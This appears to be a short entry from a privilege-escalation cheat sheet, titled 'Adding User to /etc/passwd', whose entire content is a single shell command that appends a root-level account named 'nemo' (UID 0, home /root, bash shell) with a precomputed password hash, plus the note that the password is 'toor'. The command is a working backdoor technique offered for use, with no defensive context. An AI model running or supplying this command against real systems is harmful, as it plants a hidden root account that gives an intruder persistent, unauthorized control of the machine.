Adding User to /etc/passwd

echo 'nemo:fioaKmuWSeBhQ:0:0:root:/root:/bin/bash' >> /etc/passwd
  • Password is "toor"

Last updated